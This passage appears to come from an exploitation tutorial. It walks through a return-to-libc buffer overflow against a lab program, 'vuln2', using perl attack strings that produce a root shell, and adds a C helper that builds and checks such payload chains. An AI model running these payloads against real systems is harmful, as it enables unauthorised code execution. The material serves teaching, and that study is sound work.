Exit anyway? (y or n) y
BT book $
Now that we have the location of the beginning of the buffer, add the offset calculated
earlier to get the correct target location (the sixth 4-byte memory slot after our overflowed
buffer: 28 bytes of filler plus five 4-byte slots, 48 bytes, or 0x30):
0xbffff560 + 0x30 = 0xbffff590
Finally, we have all the data we need; let's attack!
BT book $ ./vuln2 `perl -e 'print "AAAA"x7 . "\x80\x65\xee\xb7"."\x70\xf8\xf2\xb7"."\xe5\xfd\xff\xbf"."\x02\xfe\xff\xbf"."\x02\xfe\xff\xbf"."\x90\xf5\xff\xbf"'`
sh-3.1# exit
exit
BT book $
Woot! It worked. Some of you may have realized a shortcut here. If you look at the last
illustration, you will notice the last value of the attack string is a NULL. Occasionally,
you will run into this situation. In that rare case, you don't care if you pass a NULL byte
into the vulnerable program, as the copied string is terminated by a NULL anyway. Note that
only that single terminating NULL byte is written; the other three bytes of that stack slot
keep whatever value was already there, which is why this shortcut depends on the scenario.
In this canned scenario, you could have removed the printf() function and simply fed the
execl() attack string as follows (each bracket after the filler is one 4-byte slot):
./vuln2 [filler of 28 bytes][&execl][&exit][./wrapper][./wrapper][\x00]
Try it.
BT book $ ./vuln2 `perl -e 'print "AAAA"x7 . "\x70\xf8\xf2\xb7"."\xa0\xe3\xec\xb7"."\x02\xfe\xff\xbf"."\x02\xfe\xff\xbf"."\x00"'`
sh-3.1# exit
exit
BT book $
Both ways work in this case.
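To show the arithmetic and the attack-string layout above in code rather than by hand, here is an added example (not from the book or the vuln2 program) that computes the address of the Nth stack slot past the filler, packs a chain of libc function addresses and arguments little-endian for x86, and checks whether a NUL-terminated copy such as strcpy() would truncate the payload. It reuses the page's values (buffer at 0xbffff560, 28 bytes of filler, the execl, exit and printf addresses, and the ./wrapper string address 0xbffffe02); the slot_addr() and nul_safe() helpers are my own names, not part of any tool.

```c
/* ret2libc_chain.c: build and sanity-check return-to-libc attack strings
 * of the form [filler][&func][&return-target][args...] (x86, 32-bit LE). */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Address of 4-byte slot `index` after the filler (index 0 overwrites the
 * saved return address). index 5 is the "sixth memory slot" of the page. */
uint32_t slot_addr(uint32_t buf_start, size_t filler_len, size_t index)
{
    return buf_start + (uint32_t)filler_len + 4u * (uint32_t)index;
}

/* The page's shortcut: buffer start plus the precomputed offset. */
uint32_t target_slot(uint32_t buf_start, uint32_t offset)
{
    return buf_start + offset;
}

/* Little-endian packing, what the perl "\x80\x65\xee\xb7" strings do by hand. */
static size_t put_le32(unsigned char *dst, uint32_t v)
{
    dst[0] = (unsigned char)(v & 0xffu);
    dst[1] = (unsigned char)((v >> 8) & 0xffu);
    dst[2] = (unsigned char)((v >> 16) & 0xffu);
    dst[3] = (unsigned char)((v >> 24) & 0xffu);
    return 4;
}

/* Layout: [filler][&func][&ret: where func "returns", i.e. the next function]
 * [args...][optional single 0x00]. Returns the number of bytes written. */
size_t build_ret2libc(unsigned char *out, size_t filler_len,
                      uint32_t func_addr, uint32_t ret_addr,
                      const uint32_t *args, size_t nargs, int trailing_nul)
{
    size_t n = 0;
    memset(out, 'A', filler_len);
    n += filler_len;
    n += put_le32(out + n, func_addr);
    n += put_le32(out + n, ret_addr);
    for (size_t i = 0; i < nargs; i++)
        n += put_le32(out + n, args[i]);
    if (trailing_nul)
        out[n++] = 0x00;
    return n;
}

/* A strcpy-style copy stops at the first NUL. Return its index, or len if none. */
size_t first_nul(const unsigned char *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (p[i] == 0)
            return i;
    return len;
}

/* The payload survives a NUL-terminated copy only if it has no NUL at all,
 * or the only NUL is the final byte (the page's "rare case"). */
int nul_safe(const unsigned char *p, size_t len)
{
    size_t i = first_nul(p, len);
    return i == len || i == len - 1;
}

/* Print as a perl-style escaped string for pasting into the command line. */
void print_escaped(const unsigned char *p, size_t len)
{
    for (size_t i = 0; i < len; i++)
        printf("\\x%02x", p[i]);
    putchar('\n');
}

int main(void)
{
    unsigned char p[128];
    uint32_t buf = 0xbffff560u;                 /* buffer start from gdb */
    uint32_t sixth = slot_addr(buf, 28, 5);     /* 0xbffff590 */

    /* Chain 1 (page): printf -> execl, last arg points at the sixth slot. */
    uint32_t args1[] = { 0xbffffde5u, 0xbffffe02u, 0xbffffe02u, sixth };
    size_t n = build_ret2libc(p, 28, 0xb7ee6580u, 0xb7f2f870u, args1, 4, 0);
    printf("chain 1: %zu bytes, nul-safe=%d, sixth slot=0x%08x\n",
           n, nul_safe(p, n), sixth);
    print_escaped(p, n);

    /* Chain 2 (shortcut): execl -> exit, "./wrapper" twice, then the lone NUL. */
    uint32_t args2[] = { 0xbffffe02u, 0xbffffe02u };
    n = build_ret2libc(p, 28, 0xb7f2f870u, 0xb7ece3a0u, args2, 2, 1);
    printf("chain 2: %zu bytes, nul-safe=%d (first NUL at %zu)\n",
           n, nul_safe(p, n), first_nul(p, n));
    print_escaped(p, n);
    return 0;
}
```

Running it reproduces both perl strings byte for byte and confirms that neither chain contains a NUL before its final byte; an address such as 0xb7ee0080 would fail the nul_safe() check, which is exactly when the printf() trick from the page (writing the zero after the copy) becomes necessary.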